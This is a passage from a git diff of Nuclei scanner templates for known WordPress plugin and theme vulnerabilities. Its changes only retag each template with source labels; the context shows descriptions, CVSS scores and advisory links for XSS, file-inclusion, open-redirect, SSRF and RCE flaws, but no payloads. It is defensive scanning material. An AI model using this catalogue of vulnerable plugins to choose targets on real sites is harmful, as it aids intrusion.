lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/members-list-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/members-list-xss.yaml index 27b69120c..7709bc6fb 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/members-list-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/members-list-xss.yaml @@ -7,7 +7,7 @@ info: description: The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues. reference: - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648 - tags: wp,wordpress,wp-plugin,xss + tags: wp,wordpress,wp-plugin,xss,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/modula-image-gallery-xss.yaml index 30868c186..52b32b1b2 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/modula-image-gallery-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/modula-image-gallery-xss.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/modula-best-grid-gallery metadata: verified: true - tags: wp-plugin,xss,wp,wordpress,authenticated + tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/mthemeunus-lfi.yaml index e767f777f..2c6147bf7 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/mthemeunus-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi,wordpress,mtheme + tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/music-store-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/music-store-open-redirect.yaml index 6a5babc27..9ed233889 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/music-store-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1 - https://seclists.org/fulldisclosure/2015/Jul/113 - tags: wordpress,redirect,wp-plugin,musicstore,wp + tags: musicstore,wp,wpscan,seclists,wordpress,redirect,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml index adb3a0d84..1640b233d 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,wp-plugin,xss,authenticated + tags: wordpress,wp-plugin,xss,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index 1e96e98d9..bb6183b62 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -9,7 +9,7 @@ info: reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1 - tags: wordpress,wp-theme,lfi,wp + tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/new-user-approve-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/new-user-approve-xss.yaml index 7efb42134..489b6a9e2 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/new-user-approve-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/new-user-approve metadata: verified: true - tags: wp,wordpress,xss,authenticated,wp-plugin + tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/newsletter-open-redirect.yaml index 4f4773bd5..8dfa04f11 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/newsletter-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -10,7 +10,7 @@ info: - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 classification: cwe-id: CWE-601 - tags: wordpress,redirect,wp-plugin,newsletter,wp + tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/pieregister-open-redirect.yaml index b6c0e3a3d..907b71827 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/pieregister-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/pieregister-open-redirect.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/pie-register/ classification: cwe-id: CWE-601 - tags: wordpress,redirect,wp-plugin,pieregister + tags: redirect,wp-plugin,pieregister,wpscan,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml b/config/nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml index cc59e1a13..773f8addf 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml @@ -8,7 +8,7 @@ info: AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such. reference: - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705 - tags: wordpress,wp-plugin,sassy,xss,wp + tags: xss,wp,wpscan,wordpress,wp-plugin,sassy requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/seo-redirection-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/seo-redirection-xss.yaml index 41362a0a8..a00a963a9 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -9,7 +9,7 @@ info: remediation: Fixed in version 7.4. reference: - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea - tags: wordpress,xss,wp-plugin,authenticated + tags: wordpress,xss,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml index 264c22071..55d873b64 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,shortcode,wp + tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml index ab0e2dfb8..6144ec058 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/shortpixel-image-optimiser metadata: verified: true - tags: xss,wp-plugin,wp,wordpress,shortpixel,authenticated + tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 242409f7b..704a2ea88 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -7,7 +7,7 @@ info: description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. reference: - https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f - tags: wp-plugin,redirect,wordpress + tags: wp-plugin,redirect,wordpress,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml index 551b77647..988433ebc 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ - tags: wp-plugin,xss,wp,wordpress,woocommerce,authenticated + tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml index fd1ae9b37..853cae35b 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the bbpress wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6158 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml index 3f1e03ab8..8427ed434 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the elementor wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6297 - tags: wordpress,listing,plugin + tags: listing,plugin,edb,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-git-config.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-git-config.yaml index 0373acfeb..2d2d71ad9 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-git-config.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-git-config.yaml @@ -7,7 +7,7 @@ info: description: Searches for the pattern /.git/config inside themes and plugins folder. reference: - https://hackerone.com/reports/248693 - tags: config,git,exposure,wordpress,wp-plugin,wp-theme + tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml index 10e417ba5..25aac1dce 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the gtranslate wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 988a740c1..d9b30e3b3 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: wordpress,wp-plugin,rce,intrusive,upload,python + tags: wpscan,wordpress,wp-plugin,rce,intrusive,upload,python requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml index 5c849255a..c5e1b5fa1 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-redirection plugin. reference: - https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml index 98e44aa9d..bf208b67c 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml @@ -8,7 +8,7 @@ info: The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email. reference: - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2 - tags: wordpress,wp-plugin,wp,unauth + tags: wordpress,wp-plugin,wp,unauth,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml index 6dd3f645a..f514fc1fc 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index 844fa85bb..dff071741 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6437 - tags: wordpress,wp-plugin + tags: wp-plugin,edb,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index b42a79767..133a7642a 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the woocommerce wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing,plugin,woocommerce + tags: edb,wordpress,listing,plugin,woocommerce requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index c81493f97..ded165192 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wordfence + tags: wordpress,wp-plugin,lfi,wordfence,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 88294b4ca..80366e19d 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -9,7 +9,7 @@ info: reference: - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5 - tags: wordpress,xss,wp + tags: wordpress,xss,wp,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml index e78615fb5..f87d1a566 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml @@ -8,7 +8,7 @@ info: reference: - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml index e6649074f..b2e684a96 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin,wp + tags: wpscan,wordpress,xss,wp-plugin,wp requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-all-export-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-all-export-xss.yaml index 324c81721..3583198d6 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-all-export-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-all-export-xss.yaml @@ -9,7 +9,7 @@ info: verified: true reference: - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4 - tags: wp-plugin,xss,wp,wordpress,authenticated + tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml index c9e3f38a7..16bbd02f1 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.exploit-db.com/exploits/38568 - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381 - tags: wordpress,xss,wp-plugin,wp + tags: wp-plugin,wp,edb,wpscan,wordpress,xss requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-arforms-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-arforms-listing.yaml index 32df4d1c9..ce76b14dd 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-arforms-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-arforms-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6424 - tags: wordpress,listing,plugin + tags: listing,plugin,edb,wordpress requests: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 6802b267d..622e4bcae 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -7,7 +7,7 @@ info: description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability reference: - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 - tags: wordpress,xss,wp-plugin + tags: wpscan,wordpress,xss,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml index 09ba092ec..dc352a315 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6428 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml index 174202864..17a736c84 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html - tags: wordpress,xss,wp-plugin + tags: xss,wp-plugin,packetstorm,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml index 98183da5f..9bbedc3cb 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/exploits/38674 - tags: wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml index 3954cc343..71fcf22a0 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml @@ -7,7 +7,7 @@ info: description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. reference: - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a - tags: wordpress,wp-theme,redirect + tags: wp-theme,redirect,wpscan,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml index b1b829e9e..8f506bd11 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6416 - tags: wordpress,listing,plugin + tags: plugin,edb,wordpress,listing requests: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml index afe2b16ec..87a1bcbda 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -9,7 +9,7 @@ info: - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3 metadata: verified: true - tags: wp-plugin,xss,wp,wordpress,authenticated,woody + tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml index 22f7ad9dc..a42e55015 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6427 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml index 6d42a3ed6..9e11f2640 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi,wp + tags: wordpress,wp-theme,lfi,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 7d9628915..e2e319f9a 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi + tags: wpscan,wordpress,wp-plugin,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 0c399ba1b..a260d16be 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 - tags: wordpress,rce,ssrf + tags: wordpress,rce,ssrf,edb,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml index 01b472a14..219d65ff2 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6420 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml index ef8c63ffe..a20a12670 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6998 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml index 75b3e3a04..f2bca586a 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml @@ -7,7 +7,7 @@ info: description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. reference: - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc - tags: wordpress,wp-theme,redirect + tags: wordpress,wp-theme,redirect,wpscan requests: - method: GET diff --git 